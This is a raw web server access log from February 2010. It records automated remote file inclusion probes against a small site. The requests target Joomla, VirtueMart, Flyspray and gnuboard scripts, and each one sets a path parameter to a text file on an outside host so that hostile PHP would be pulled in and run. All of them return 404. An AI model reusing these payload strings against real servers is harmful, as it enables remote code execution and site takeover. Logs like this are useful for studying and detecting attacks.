72.241.52.111 - - [06/Feb/2010:07:31:10 -0800] "GET /logs/access_100116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:07:31:39 -0800] "GET /logs/access_100116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:07:33:40 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:07:33:40 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:07:33:40 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:07:36:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:07:36:13 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:07:36:13 -0800] "GET /logs/access_091121.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:07:36:47 -0800] "GET /logs/access_100130.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.251 - - [06/Feb/2010:07:37:30 -0800] "GET /logs/access_100116.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.113.251 - - [06/Feb/2010:07:40:45 -0800] "GET /logs/access_100206.log HTTP/1.0" 200 5780356 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
89.111.173.76 - - [06/Feb/2010:07:44:22 -0800] "GET /write_update.php?board_skin_path=http://www.lazermark.ru/magazin/administrator/components/com_virtuemart/sql/id??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:47:36 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:47:36 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:47:36 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:49:15 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:49:15 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:07:49:15 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:07:51:07 -0800] "GET /logs/access.log/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:07:51:07 -0800] "GET /export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:07:51:07 -0800] "GET /logs/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:14 -0800] "GET /logs/access_091121.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:14 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:14 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:36 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:37 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:53:37 -0800] "GET /logs/access_091121.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:07:54:49 -0800] "GET /logs/access.log/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:07:54:49 -0800] "GET /export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:07:54:49 -0800] "GET /logs/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:22 -0800] "GET /gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:22 -0800] "GET /logs//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:22 -0800] "GET /logs/access.log//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:33 -0800] "GET /logs/access_100130.log//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:33 -0800] "GET /gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:33 -0800] "GET /logs//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:33 -0800] "GET /logs/access.log//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:07:56:42 -0800] "GET /logs/access_100130.log//gnuboard4///gnuboard4//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Feb/2010:07:59:51 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Feb/2010:07:59:51 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Feb/2010:07:59:51 -0800] "GET /logs/access_100130.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
24.207.120.69 - - [06/Feb/2010:08:02:04 -0800] "GET /logs/access.log/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
24.207.120.69 - - [06/Feb/2010:08:02:04 -0800] "GET /export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
24.207.120.69 - - [06/Feb/2010:08:02:04 -0800] "GET /logs/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:03:13 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:03:13 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:08:03:13 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:08:04:29 -0800] "GET /logs/access_091121.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:08:04:54 -0800] "GET /logs/access_091121.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:08:05:04 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:08:05:08 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
143.248.146.168 - - [06/Feb/2010:08:05:08 -0800] "GET /logs/access_100116.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:05:58 -0800] "GET /logs/access_100116.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:05:58 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:05:58 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:39 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:39 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:39 -0800] "GET /logs/access_100116.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:44 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:45 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:45 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:47 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:47 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:06:47 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:06:55 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:06:55 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:06:55 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:08:07:08 -0800] "GET /logs/access_100130.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:08:07:15 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:08:07:15 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:08:07:15 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:08:07:17 -0800] "GET /logs/access_100130.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:07:52 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:07:52 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:07:52 -0800] "GET /logs/access_100116.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:07:54 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:07:54 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:07:54 -0800] "GET /logs/access_100116.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:08:21 -0800] "GET /components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:08:21 -0800] "GET /logs/access_100116.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:08:08:24 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:08:10:11 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:08:10:22 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:47 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:47 -0800] "GET /logs/access.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:47 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:52 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:52 -0800] "GET /logs/access.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:52 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:53 -0800] "GET /logs/access.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:53 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:10:53 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:14 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:14 -0800] "GET /logs/access_091024.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:14 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /logs/access_091024.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /logs/access_091024.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:17 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:19 -0800] "GET /logs/access_100130.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:26 -0800] "GET /logs/access_100130.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:26 -0800] "GET /logs/access_100130.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:37 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:37 -0800] "GET /logs/access.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:37 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.36.175.10 - - [06/Feb/2010:08:11:41 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
